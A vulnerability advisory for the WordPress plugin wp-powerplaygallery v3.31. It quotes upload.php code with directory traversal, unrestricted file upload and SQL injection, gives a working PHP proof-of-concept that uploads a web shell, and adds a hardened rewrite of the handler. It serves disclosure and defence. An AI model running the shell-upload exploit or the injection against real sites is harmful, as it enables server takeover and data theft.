Title: Remote file upload vulnerability & Blind SQLi in WordPress plugin wp-powerplaygallery v3.31

1. Ability to create directories outside of the upload path by using ../

Lines 56-59 of upload.php:

    56 // Create target dir
    57 if (!file_exists($targetDir)) {
    58     @mkdir($targetDir);
    59 }

2. Arbitrary file uploads to a path in the web root directory

Lines 138-160 of upload.php don't verify what types of files are allowed or where they should be placed:

    138 // Open temp file
    139 if (!$out = @fopen("{$filePath}.part", $chunks ? "ab" : "wb")) {
    140     die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
    141 }
    142
    143 if (!empty($_FILES)) {
    144     if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
    145         die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
    146     }
    147
    148     // Read binary input stream and append it to temp file
    149     if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
    150         die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    151     }
    152 } else {
    153     if (!$in = @fopen("php://input", "rb")) {
    154         die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    155     }
    156 }
    157
    158 while ($buff = fread($in, 4096)) {
    159     fwrite($out, $buff);
    160 }

3. SQL injection

Lines 131-135 of upload.php fail to handle user input appropriately, either by sanitizing or parameterizing it. Injection points are any GET/POST to albumid or name.

    131 $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date`)
    132     VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
    133
    134 $wpdb->query($query);
    135

Exploit:

    <?php
    /* Remote shell upload exploit for wp-powerplaygallery v3.3 */
    /* Larry W. Cashdollar @_larry0 6/27/2015

       albumid needs to be a numeric value matching an existing album number,
       1 is probably a good start but you can enumerate these by using curl,
       and looking for redirect 301 responses:
       e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big
       -> 301 exists else 404 doesn't.
       shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php */

    $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
    $file_name_with_full_path = '/var/www/shell.php';

    echo "POST to $target_url $file_name_with_full_path";

    $post = array('albumid' => 'foo', 'name' => 'shell.php', 'file' => '@' . $file_name_with_full_path);

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);

    echo "<hr>";
    echo $result;
    echo "<hr>";
    ?>
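As an added example, not the plugin's own code, the same handler logic rewritten to close all three issues listed above: the function name pp_handle_upload_hardened is hypothetical, the album-folder layout (power_play/<id>_uploadfolder/big) is taken from the exploit comment, and the WordPress helpers used (current_user_can, absint, sanitize_file_name, wp_check_filetype, wp_upload_dir, wp_mkdir_p, $wpdb->prepare, wp_send_json_error) are standard WordPress APIs assumed to be loaded.

```php
<?php
// Added example (not the plugin's code): hardened replacement for the
// upload.php logic quoted in the advisory. Assumes it runs inside WordPress.
function pp_handle_upload_hardened() {
    global $wpdb;

    // Only users allowed to upload media may reach this handler at all.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }

    // Issue 3 (SQLi): albumid is coerced to a non-negative integer.
    $album_id = isset($_REQUEST['albumid']) ? absint($_REQUEST['albumid']) : 0;
    if ($album_id === 0) {
        wp_send_json_error('invalid albumid', 400);
    }

    // Issue 2 (arbitrary upload): keep only a cleaned basename and whitelist
    // image extensions/MIME types; anything else (e.g. .php) is rejected.
    $name = isset($_REQUEST['name']) ? sanitize_file_name(basename($_REQUEST['name'])) : '';
    $allowed = array('jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif');
    $type = wp_check_filetype($name, $allowed);
    if ($name === '' || empty($type['ext'])) {
        wp_send_json_error('file type not allowed', 400);
    }

    // Issue 1 (../ traversal): the target directory is built by the server
    // from the integer album id, never from request-supplied path parts, and
    // the resolved path is still checked to lie under the uploads base dir.
    $base   = wp_upload_dir()['basedir'];
    $target = $base . '/power_play/' . $album_id . '_uploadfolder/big';
    if (!wp_mkdir_p($target) || strpos(realpath($target), realpath($base)) !== 0) {
        wp_send_json_error('bad target dir', 400);
    }
    $dest = $target . '/' . $name;

    // Accept only a genuine PHP upload (no raw php://input stream).
    if (empty($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($_FILES['file']['tmp_name'])
        || !move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
        wp_send_json_error('upload failed', 400);
    }

    // Issue 3 (SQLi): parameterised INSERT via $wpdb->prepare(); the remaining
    // columns of pp_images are omitted here for brevity.
    $wpdb->query($wpdb->prepare(
        "INSERT INTO {$wpdb->prefix}pp_images (`category_id`, `title`, `image`, `status`, `creation_date`)
         VALUES (%d, %s, %s, 1, NOW())",
        $album_id, $name, $name
    ));
    wp_send_json_success(array('file' => $name));
}
```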